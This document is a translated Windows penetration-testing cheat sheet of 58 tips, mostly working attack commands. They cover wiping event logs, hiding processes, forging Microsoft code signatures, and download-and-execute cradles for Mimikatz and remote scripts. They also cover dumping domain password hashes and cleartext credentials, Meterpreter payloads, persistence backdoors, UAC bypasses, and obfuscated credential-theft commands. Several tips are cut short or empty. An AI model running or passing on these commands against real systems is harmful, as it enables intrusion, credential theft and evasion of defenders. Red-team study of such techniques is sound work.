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A collection of pentest and development tips

Author: 3gstudent


The following techniques should not be used for illegal purposes.

Tips 1. Manual port detection

Nmap's -sV can detect the service version, but in some cases it must be manually detected to verify.

Use Wireshark to get response packages is far less simple than using nc.


For port 8001, use nc to connect the port and then enter a random string. You'll get the following result:

$ nc -vv localhost 8001  
localhost [] 8001 (?) open
HTTP/1.1 400 Bad Request
Date: Fri, 25 Aug 2017 12:15:25 GMT
Server: Apache/2.4.23 (Debian)
Content-Length: 301
Connection: close
Content-Type: text/html; charset=iso-8859-1
<title>400 Bad Request</title>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
<address>Apache/2.4.23 (Debian) Server at Port 8001</address>

From this we know that this is an http service, because the string we sent is not a valid HTTP request, so we return a 400 Bad requests, we also get the system version is Debian, WebServer is Apache.



Tips 2. Download files from Kali to windows


python -m SimpleHTTPServer 80


certutil.exe -urlcache -split -f 1.exe
certutil.exe -urlcache -split -f delete



Tips 3. Configure the computer in WORKGROUP to support the IPC connection

Add user:

net user test test /add
net localgroup administrators test /add

Modify the registry to support remote connections:

reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1

IPC connection:

net use \\ test /u:test

Tips 4. Cleanup the Windows XML Event Log(evtx)

Get a list of evtx log categories:

wevtutil el >1.txt

Get statistics for a single evtx log category:


wevtutil gli "windows powershell"


creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1

View the specific content of the specified evtx log:

wevtutil qe /f:text "windows powershell"

Find the specified amount of log content:

wevtutil qe /f:text "windows powershell" /c:20

Delete all information for a single log category:

wevtutil cl "windows powershell"



Remove individual lines from Windows XML Event Log (EVTX) files:


Tips 5. Destroy the Event Log Service

The thread that implements the logging function is terminated by calling TerminateThread, which disables the logging function, but the Windows Event Log service is not destroyed and the state is still running.






Tips 6. Process hiding under Win7 and Windows Server 2008 R2

Use global APIhooks to modify the registry.

Download project:

Modify the code to specify the program name cldr.exe to be hidden, compile into cldr.dll, cldr.dll in C:\ProgramData\Microsoft\HelpLibrary\

Administrator privileges:

reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f

At this time, cldr.exe does not exist in the task manager process list, cldr.exe does not exist in Process Explorer, and cldr.exe does not exist in Tasklist.exe.

For 64-bit systems:

Administrator privileges:

reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldrx64.dll" /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f



Tips 7. Execution order of exe and com files with the same name

If a path contains both exe and com files with the same name, such as test.exe and Enter test (without the file suffix) through the command line, and the com file will be run first.

The generation of COM files only needs to change the suffix name of the exe file to com.


《A dirty way of tricking users to bypass UAC》

Tips 8. Windows system certificate generation and registration

Certificate generation and signature:

makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer
cert2spc Root.cer Root.spc
pvk2pfx -pvk Root.pvk -pi 12345678password -spc Root.spc -pfx Root.pfx -f
signtool sign /f Root.pfx /p 12345678password test.exe

It will generate four files: Root.cer, Root.pfx, Root.pvk, and Root.spc, and test.exe will be digitally signed.

Certificate registration:

Add the certificate to localmachine(Administrator privileges):

certmgr.exe -add -c Root.cer -s -r localmachine root


《A dirty way of tricking users to bypass UAC》

Tips 9. Use HTML Application(hta) to run VBScript, and then use VBScript to run Powershell scipt


<script language="VBScript">
    Set WshShell = CreateObject("WScript.Shell")
    Connect="powershell -nop -windows hidden -E YwBhAGwAYwAuAGUAeABlAA=="
    WshShell.Run Connect, 4, true
WINDOWSTATE = "minimize">


《Bypass McAfee Application Control——Code Execution》

Tips 10. Write dll by c# and load dll via rundll32.exe or regsvr32

By default, c# cannot declare exported functions, but can be implemented by adding UnmanagedExports.

Of course, dlls written by c# need to be run in the corresponding version of the .NET environment. The dlls written in C++ are more general.

The dll can be loaded by rundll32.exe or regsvr32, but the dll is required to contain a specific export function.


《Code Execution of Regsvr32.exe》

Tips 11. Introduction to cpl file under Windows

Essentially a DLL file with a suffix of cpl and an export function CPLApplet.

Five methods of implementation:

(1) Double click to run directly

(2) cmd

rundll32 shell32.dll,Control_RunDLL test.cpl

(3) cmd

control test.cpl

(4) vbs

Dim obj
Set obj = CreateObject("Shell.Application")

(5) js

var a = new ActiveXObject("Shell.Application");



Tips 12. Use rundll32 via cmd to execute a piece of code to get a shell of Windows



rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

Of course, the RAT tool can also be loaded by:

  • vbs
  • js
  • exe
  • dll
  • shellcode


《JavaScript Backdoor》

《JavaScript Phishing》

Tips 13. The key of putty&pageant can be restored by memory dump

Both windows and Linux apply


《Memory Dump利用实例》

Tips 14. Phishing for Visual Studio

Visual C++:

  • Modify the .vcxproj file

Visual Basic:

  • Modify the .vbproj file

Visual F#:

  • Modify the .fsproj file

Ability to execute arbitrary code when compiling for any of the above projects using Visual Studio


《Pay close attention to your download code——Visual Studio trick to run code when building》

Tips 15. When a 32-bit program is executed under a 64-bit Windows system, there is a redirect if there is an operation on the registry and files.

For registry operations:

The actual path to access HKLM\Software\ is HKLM\Software\Wow6432Node\

For file operations:

The actual path to access c:\windows\Sysnative\ is c:\windows\system32
The actual path to access c:\windows\system32\ is c:\windows\SysWOW64\



Tips 16. Dump all the hash of the domain user from the domain controller

Method 1:

Copy ntds.dit:

Use NinjaCopy, (Author: Joe Bialek, Twitter: @JosephBialek)

Dump hash:

Use quarkspwdump,

esentutl /p /o ntds.dit
QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt

Method 2:

Use DSInternals PowerShell Module,

Applicable conditions:

Windows PowerShell 3.0 or 3.0+

.NET Framework 4.0 or 4.0+




Method 3:


mimikatz.exe "lsadump::dcsync /domain:test.local /all /csv" exit

Tips 17. Dump Clear-Text Password under Windows

Windows Server 2012 cannot use mimikatz to export clear-text password by default, as are some Windows Server 2008.

Workaround: Enable Wdigest Auth


reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f



Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1

Restart or user login again, can export clear-text password


《域渗透——Dump Clear-Text Password after KB2871997 installed》

Tips 18. The new password of the domain controller can be recorded in real time through Hook PasswordChangeNotify.

Of course, you can choose to save locally or upload your password to the server.


《域渗透——Hook PasswordChangeNotify》

Tips 19. Remember to pay attention to the local administrator account of the host in the domain

If the administrator neglects that the hosts in the domain use the same local administrator account, you can remotely log in to other hosts in the domain through pass-the-hash.


《域渗透——Local Administrator Password Solution》

Tips 20. Get the dll export function through powershell

Get-Exports -DllPath c:\Windows\system32\dimsjob.dll -ExportsToCpp C:\test\export.txt


《Study Notes Weekly No.3(Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)》

Tips 21. Parameter hiding tips for shortcuts

Put the payload after 260 null characters, so you can't view the payload in the file attribute. It can be used to hide the payload in the shortcut, trick the user to click, and conceal the execution code.



Tips 22. 32-bit programs can remotely inject 64-bit processes




Tips 23. The process needs to be downgraded in some cases

Processes that use sytem permissions may encounter the following issues:

  1. Unable to get the current user's file content

For example, the user's screen cannot be captured

  1. Environmental variables are different

Therefore need to reduce the rights to the current user

Method 1: Use SelectMyParent.exe



Method 2: Use msdtc

Use msdtc will load oci.dll with system privilege, but execute it in the admin privilege cmd: msdtc -install, it will start calc.exe with high permission.


《Use msdtc to maintain persistence》

Tips 24. You can install WinPcap on Windows by command line, so you can use nmap and Masscan on the host you already control



Tips 25. How to execute mimikatz on Windows platform

Method 1: Use powershell

powershell "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCreds"

Method 2: Use InstallUtil.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe




Method 3: Use regsvr32.exe

Encapsulate mimikatz into dll and run mimkatz via regsvr32 passed in parameters

rundll32 katz.dll,EntryPoint log coffee exit  


《Code Execution of Regsvr32.exe》

Method 4: Use msbuild.exe

Download the xml file and save it as a.xml:


C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe executes a.xml


《Use MSBuild To Do More》

Method 5: Use csi.exe

"C:\Program Files (x86)\MSBuild\14.0\Bin\csi.exe" c:\test\katz.csx


《Study Notes Weekly No.4(Use tracker to load dll & Use csi to bypass UMCI & Execute C# from XSLT file)》

Method 6: Use the js/vbs script



Tips 26. The location in the Windows system where you can store and read the payload.

Method 1: WMI


$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Command'
$StaticClass.Properties.Add('Command' , $Payload)


$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value


《WMI Backdoor》

Method 2: PE file containing digital signature

Use the algorithm flaw of the file hash, hide the Payload from the PE file without affecting the digital signature of the PE file.



Method 3: Special ADS

(1) ...

type putty.exe > ...:putty.exe
wmic process call create c:\test\ads\...:putty.exe

(2) Special COM files

type putty.exe > \\.\C:\test\ads\COM1:putty.exe
wmic process call create \\.\C:\test\ads\COM1:putty.exe

(3) Disk root directory

type putty.exe >C:\:putty.exe 
wmic process call create C:\:putty.exe


《Hidden Alternative Data Streams的进阶利用技巧》

Tips 27. Information worth collecting in Windows system

(1) Registered WMI information

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list

The administrator may use WMI to record the attacker's call to WMI, which can be viewed by wmic. Of course, the monitoring function can be disabled by wmic.


《Study Notes Weekly No.1(Monitor WMI & ExportsToC++ & Use DiskCleanup bypass UAC))》

(2)Computer Name

wmic /node: /user:"administrator" /password:"123456" /NAMESPACE:"\\root\CIMV2" PATH Win32_OperatingSystem get CSName

Tips 28. Meterpreter under Windows

Method 1: Loading dll via rundll32


msfvenom -p windows/meterpreter/reverse_http -f dll LHOST= LPORT=8080>./a.dll

Generate a.dll and upload it to the host

Execute rundll32.exe a.dll, Control_RunDLL,

Method 2: Via cpl

Generate dll, rename it to cpl, double click to execute

Method 3: Via powershell

Tips 29. How to load dll in Windows system

Method 1: rundll32

rundll32 a.dll,EntryPoint

Method 2:regsvr32

regsvr32 a.dll


《Code Execution of Regsvr32.exe》

Method 3:odbcconf

odbcconf.exe /a {regsvr c:\test\odbcconf.dll}


《Study Notes Weekly No.3(Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)》

Method 4:Tracker

Tracker.exe /d test.dll /c svchost.exe

Tracker.exe contains Microsoft digital signatures that bypass the limitations of the application whitelist


《Study Notes Weekly No.4(Use tracker to load dll & Use csi to bypass UMCI & Execute C# from XSLT file)》

Method 5: Excel.Application object's RegisterXLL() method

Prerequisite: Microsoft Office software is installed


rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\test\\messagebox.dll');this.close();


var excel = new ActiveXObject("Excel.Application");


$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))


《Use Excel.Application object's RegisterXLL() method to load dll》

Method 6: xwizard.exe

Copy xwizard.exe from %windir%\system32\ to the new directory C:\x.

Rename msg.dll to xwizards.dll and save it at C:\x.

Command line execution:

xwizard processXMLFile 1.txt

It will load C:\x\xwizards.dll.


《Use xwizard.exe to load dll》

Tips 30. Windows Persistence

Method 1: bitsadmin

bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec%  %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i: scrobj.dll"
bitsadmin /Resume backdoor


《Use bitsadmin to maintain persistence and bypass Autoruns》

Method 2: mof

pragma namespace("\\\\.\\root\\subscription")    
instance of __EventFilter as $EventFilter
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP1";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 1";
    QueryLanguage = "WQL";
instance of ActiveScriptEventConsumer as $Consumer
    Name = "consP1";
    ScriptingEngine = "JScript";
    ScriptText = "GetObject(\"script:\")";
instance of __FilterToConsumerBinding
    Consumer   = $Consumer;
    Filter = $EventFilter;

Administrator privileges:

mofcomp test.mof


《WSC、JSRAT and WMI Backdoor》

Method 3: wmi

Execute notepad.exe every 60 seconds

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""


《Study Notes of WMI Persistence using wmic.exe》

Method 4: Userland Persistence With Scheduled Tasks

Hijack the scheduled task UserTask, load testmsg.dll at system startup.

The operation is as follows:

Create a new item under HKEY_CURRENT_USER\Software\Classes\CLSID{58fb76b9-ac85-4e55-ac04-427593b1d060}

Then create a new item InprocServer32

The value is set to c:\test\testmsg.dll

Testmsg.dll contains the following export functions:

  • DllCanUnloadNow
  • DllGetClassObject
  • DllRegisterServer
  • DllUnregisterServer

Waiting for users to log in again.


《Userland registry hijacking》

Method 5: Netsh

The helper DLL needs to include the export function InitHelperDll.

Administrator privileges:

netsh add helper c:\test\netshtest.dll

After the helper dll is successfully added, c:\test\netshtest.dll will be loaded each time netsh is called.


《Netsh persistence》

Method 6: Shim

Common ways:

  • InjectDll
  • RedirectShortcut
  • RedirectEXE

《渗透测试中的Application Compatibility Shims》

Method 7: dll hijacking

Automatically enumerate processes through Rattler to detect the existence of available dll hijacking processes.


  • c:\windows\midimap.dll



Method 8: DoubleAgent

Write a custom Verifier provider DLL.

Install via Application Verifier.

Inject into the target process to execute the payload.

Whenever the target process starts, it will execute payload, which is equivalent to a self-starting method.


《渗透测试中的Application Verifier(DoubleAgent利用介绍)》

Method 9: waitfor.exe

Self-starting is not supported, but can be activated remotely, and the process is displayed as waitfor.exe


《Use Waitfor.exe to maintain persistence》

Method 10: AppDomainManager

For .Net programs, they can be hijacked by modifying the AppDomainManager. If you hijack the startup process of a system common .Net program such as powershell.exe and add a payload to it, you can implement a passive backdoor trigger mechanism.


《Use AppDomainManager to maintain persistence》

Method 11: Office Add-ins

If the office software is already installed, you can implement hijacking by configuring the Office add-in as a passive backdoor.

Commonly used methods:

  • Word WLL
  • Excel XLL
  • Excel VBA add-ins
  • PowerPoint VBA add-ins



《Use Office to maintain persistence》

《Office Persistence on x64 operating system》

Method 12: CLR

Backdoor without administrator privileges and the ability to hijack all .Net programs.



《Use CLR to maintain persistence》

Method 13: msdtc

Use the MSDTC service to load dlls, implement self-starting, and bypass Autoruns to detect startup items.


《Use msdtc to maintain persistence》

Method 14: Hijack CAccPropServicesClass and MMDeviceEnumerator

No need to reboot the system, no administrator privileges required.

Implemented by modifying the registry/



《Use COM Object hijacking to maintain persistence——Hijack CAccPropServicesClass and MMDeviceEnumerator》

Method 15: Hijack explorer.exe

No need to reboot the system, no administrator privileges required

Implemented by modifying the registry


《Use COM Object hijacking to maintain persistence——Hijack explorer.exe》

Method 16: Windows FAX DLL Injection

By DLL hijacking, hijacking Explorer.exe to load fxsst.dll.

Explorer.exe will load c:\Windows\System32\fxsst.dll at startup (service is enabled by default for fax service)

Save the payload.dll in c:\Windows\fxsst.dll, which can implement dll hijacking, hijacking Explorer.exe to load fxsst.dll.

The same idea:

Rename payload.dll to linkinfo.dll and hijack Explorer.exe to load linkinfo.dll。

Method 17: Hijack specific features of Office software

By dll hijacking, triggers backdoors when Office software performs certain functions.



Method 18: Special Registry Keys

Create a special name for the registry key, which the user normally cannot read (use the Win32 API), but the system can execute (use the Native API)




Method 19: Powershell Configuration File

Modify the powershell configuration file, the backdoor is triggered after the powershell process starts.

Check to see if you are using a configuration file:

Test-Path $profile

Create a configuration file:

New-Item -Path $profile -Type File –Force

Modify the contents of the configuration file and add a backdoor:

$string = 'Start-Process "cmd.exe"'
$string | Out-File -FilePath "C:\Users\a\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append


Method 20: xml file



Tips 31. UAC bypass

Method 1: use eventvwr.exe and registry hijacking

Applicable: Win7, Win8.1, Win 10


《Study Notes of WMI Persistence using wmic.exe》

《Userland registry hijacking》

Method 2: use sdclt.exe

For Win10


《Study Notes of using sdclt.exe to bypass UAC》

Method 3: use SilentCleanup

For Win8, Win10

reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I


《Study Notes of using SilentCleanup to bypass UAC》

Method 4: use wscript.exe

Only for Win7



Method 5: use cmstp.exe

Only for Win7

Method 5: Modify environment variables, hijack high-privilege .Net programs

For Win7-Win10

Eg. gpedit.msc

Modify the environment variables, use the CLR to hijack the boot process of gpedit.msc.


《Use CLR to bypass UAC》

Method 6: Modify the registry HKCU\Software\Classes\CLSID, hijack high-privilege program

For Win7-Win10

  • {B29D466A-857D-35BA-8712-A758861BFEA1}
  • {D5AB5662-131D-453D-88C8-9BBA87502ADE}
  • {0A29FF9E-7F9C-4437-8B11-F424491E3931}
  • {CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}


《Use CLR to bypass UAC》

Method 7: Use COM Components

Modify process information, spoof PSAPI, call COM component to implement unauthorized operation.





Tips 32. The exe or DLL generated by Visual Studio is used in other systems, indicating the lack of relevant DLL files.

Workaround: Package the program for release.

Project Menu -> Project Properties, C / C + + -> Code Generation -> Run Library, select multi-threading (/MT)

Tips 33. Use LaZagne to export passwords stored in common applications in the current system.

You can use LaZagne to export passwords stored in common applications in the current system (eg browser, Wifi, Git, Outlook, etc.)

Of course, you can also modify the LaZagne source code to implement password export for other applications.



Tips 34. Use powershell to read and write files

Read a text file:

$file = Get-Content "1.txt"

Write a text file:

Set-content "1.txt"

Read a binary file:


Write a binary file:


Tips 35. powershell for base64 encoding/decoding


$encoded = [System.Convert]::ToBase64String($fileContent)


$fileContent = [System.Convert]::FromBase64String($encoded)


《Study Notes of using BGInfo to bypass Application Whitelisting》

Tips 36 If the powershell script is killed, try using Invoke-Obfuscation for confusion.


Set the code to be confused:

set scriptblock " Invoke-111111 -Command "log privilege::debug sekurlsa::logonpasswords exit" "

Enter encoding

Enter 1 and specify the encoding as ascii

Get confused code:

" $(SEt-iTem  'VARIaBle:OFS' '' ) "+ [StRinG](( 73,110 , 118 ,111, 107, 101, 45, 49, 49 ,49 ,49 ,49 , 49, 32 , 45 , 67, 111, 109 , 109, 97 , 110 , 100 , 32,34,108, 111, 103 ,32, 112 ,114 , 105,118,105,108, 101, 103 ,101, 58 , 58 , 100 , 101 , 98, 117 ,103,32 , 115,101,107 ,117,114 , 108,115, 97 ,58 , 58, 108 ,111 ,103,111,110, 112, 97, 115 ,115,119, 111, 114, 100, 115, 32, 101, 120,105,116 ,34 )|FOReacH-objeCT{( [ChAR][iNT] $_) } ) +"$( Set-variAbLE  'oFS'  ' ' ) "|. ( $env:PUbLic[13]+$eNv:PuBlIc[5]+'x')

Tips 37 python script to exe

Two common methods:

  • Use py2exe
  • Use PyInstaller

How to use and common bug fixes can refer to the reference link



Tips 38 Normal user rights write files to the path of administrator rights


Release files to the c:\windows folder with normal user rights

makecab c:\test\test.exe %TMP%\1.tmp
wusa %TMP%\1.tmp /extract:"c:\windows" /quiet

Applicable to Win7, Win8, learning from:



Tips 39 Summary of methods for executing programs on remote systems

Common methods:

  • at
  • psexec
  • WMIC
  • wmiexec
  • smbexec
  • powershell remoting

Psexec usage:

psexec.exe \\test.local /accepteula -u test\admin -p test123! -s -c test.bat

Test.bat is local

New method:

  • DCOM



Tips 40 Looking for services that can be utilized in Windows systems

Enumerate the path of the executable file corresponding to the Windows system service. If the path contains the write permission of the normal user, the service can be used to increase the permission.

powershell code:

$out = (Get-WmiObject win32_service | select PathName)
$out|% {[array]$global:path += $_.PathName}
for($i=0;$i -le $out.Count-1;$i++)
    $a=Get-Acl -Path $out[$i].PathName.ToUpper().Substring($out[$i].PathName.ToUpper().IndexOfAny("C"),$out[$i].PathName.ToUpper().LastIndexOfAny("\"))
 	If($a.Owner -ne "NT AUTHORITY\SYSTEM"){
		If($a.Owner -ne "NT SERVICE\TrustedInstaller"){
			If($a.Owner -ne "BUILTIN\Administrators"){				
				Get-WmiObject win32_service | ?{$_.PathName -like $out[$i].PathName}|select Name,PathName,ProcessId,StartMode,State,Status
				Write-host Owner: $a.Owner
Write-host [+] All done.


《Use powershell to find a writable windows service》

Tips 41 Use anti-virus software configuration errors to achieve self-starting and prioritizing anti-virus software execution

Windows system supports Logon Scripts. Logon Scripts are executed at system startup. The execution order takes precedence over anti-virus software. Of course, anti-virus software cannot intercept the scripts in Logon Scripts (anti-virus software has not been started).

The key is whether the anti-virus software will intercept the configuration of Logon Scripts.

Add Logon Scripts with special operations, antivirus software will not intercept.


The anti-virus software mentioned above refers to "partial" anti-virus software, which is not universal.


《Use Logon Scripts to maintain persistence》

Tips 42 Compiling c# program notes

Use Visual Studio:

The project name should correspond to the name specified by namespace. If it does not correspond, it can be modified in the project-attribute-assembly name. Otherwise, the generated dll cannot be used.

Use csc.exe:


using System;
using System.Diagnostics;

namespace TestDotNet
   public class Class1
      static Class1()

Save it as TestDotNet.cs and just use csc.exe to generate it:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library TestDotNet.cs

If saved as a.cs, ​​then you need to add /out parameter to specify the output file as TestDotNet.dll, so the assembly name is also defaulted to TestDotNet (corresponding to the same code), otherwise, although the dll can be loaded, but can not be executed, the parameters are as follows :

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library /out:TestDotNet.dll a.cs

Tips 43 Port problem with IPC connection

Use IPC connection, if the target is enabled with NetBIOS over TCP/IP, then:

  1. The target opens both ports 139 and 445, and the system preferentially uses port 445.
  2. Target disables port 445 and can connect using port 139

Target If NetBIOS over TCP/IP is disabled, then:

  1. Target disables port 445 and cannot connect

Tips 44 Get TrustedInstaller Permissions

Start the service TrustedInstaller and get the TrustedInstaller permission through Token replication.

Common methods:

  • SelectMyParent
  • Invoke-TokenManipulation.ps1
  • incognito



Tips 45 3389 Remote Desktop Connection

1, Query whether the system allows 3389 remote desktop connection:

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

1 means closed, 0 means open

View the port of the remote desktop connection:

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

2, the method of opening 3389 Remote Desktop Connection

Method 1: cmd

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

Method 2: reg file

The content is as follows:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]

Import the registry:

regedit /s a.reg


Modify the connection port to take effect after restarting


If the system has not been configured with Remote Desktop Services, you will need to add a firewall rule when you first open it, allowing port 3389. The command is as follows:

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

If the connection fails and it says:An authentication error has occurred.The function requested is not supported.

We need to close this: Allow connections only from computers running Remote Desktop with Network Level Authentication (recommended)

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x00000000 /f

3, connect the remote desktop





Non-server version of Windows, only one account is allowed to log in by default.

The specific performance is:

When logging in remotely, use the same account as the original system, the original system will be switched to the login interface.

Use a different account, the original system desktop will prompt you to disconnect the current connection (default selection after 30 seconds)


Use mimikatz.exe to execute ts::multirdp to allow multiple users to log in remotely.

The ability to achieve remote login of different accounts does not conflict, the original system desktop will not prompt the box.

Of course, use the same account as the original system, the original system will still be switched to the login interface.


This method fails after the system restarts. The next time you use it, you need to re-execute the command ts::multirdp.

It will be permanently modified by modifying the file termsrv.dll.



Tips 46 Use netsh to modify firewall rules for remote systems

The remote system needs to allow the Windows Firewall to remotely manage. The open command is as follows:

netsh advfirewall set currentprofile settings remotemanagement enable


netsh -r -u TEST\administrator -p domain123! advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow



Tips 47 Hijacking UAC

When the UAC prompt box is popped up, execute arbitrary code, and insert the payload by modifying the function of the registry hijacking signature verification.



Tips 48 Authenticode signature forgery of PE files

By modifying the registry, you can add a Microsoft certificate to the PE file.




Tips 49 Catalog signature forgery of PE files

Construct Long UNC file name, implement file name spoofing, get Catalog signature


《Catalog签名伪造——Long UNC文件名欺骗》

Tips 50 mklink

Used to create symbolic links, which can be understood as shortcuts.

Create the directory c:\test\1, point to c:\temp, and use the following actions:

(1) Create a link with the /D parameter command:

Mklink /D "c:\test\1" "c:\Temp"

(2) Create a join using the /J parameter command:

Mklink /J "c:\test\1" "c:\Temp"


The link created with the /D parameter has more "file shortcuts" for file attributes.

Use /J does not require administrator privileges.

Use /D requires administrator privileges.

Application scenario:

Change the path to the released file.

Tips 51Passes parameters when executing powershell scripts

powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -DumpCerts"

powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command ""log ""privilege::debug"" ""sekurlsa::logonpasswords"""""

Tips 52 dll injection method

1, APC



2, process hollowing



3, Process Doppelgänging


《Process Doppelganging利用介绍》

Tips 53 Default shared directory in the domain


All hosts in the domain can access, which saves group policy related data, including login script configuration files, etc.



Tips 54 Your TeamViewer may be hacked

If your TeamViewer version is 13.0.5058, don't feel free to connect to an unknown TeamViewer server, it may be hacked.


《TeamViewer 13.0.5058中的权限漏洞测试》

Tips 55 Remotely view domain-related login and logout related logs:

Method 1:

wevtutil qe security /rd:true /f:text /q:"*[System[(EventID=4672 or EventID=4623 or EventID=4672) and TimeCreated[@SystemTime>='2022-05-26T02:30:39' and @SystemTime<='2022-05-26T02:31:00']]]" /r:dc1 /u:administrator /p:password 

wevtutil qe security /rd:true /f:text /q:"(Event/System/EventID=4624 or 4623 or 4672) and Event/System/TimeCreated/@SystemTime >= '2022-05-26T02:30:39' and Event/System/TimeCreated/@SystemTime <= '2022-05-26T02:31:00'" /r:dc1 /u:administrator /p:password 

Method 2

(Not recommended, direct download file is too large)

Obtain the domain control file: C:\Windows\System32\winevt\Logs\Security.evtx, filter event 4624/4623/4672.

Tips 56 Determine if the current system is in standby mode.

The function return value of GetForegroundWindow() in the lock screen state is NULL, and the return value of GetForegroundWindow() function in non-lock screen state is a non-zero value.


Powershell POC:

Tips 57 Get the current system user no input time

Judge through API GetIdleTime.



Tips 58 Determine the screen saver startup time of the current system

Determine whether to open the screen saver:

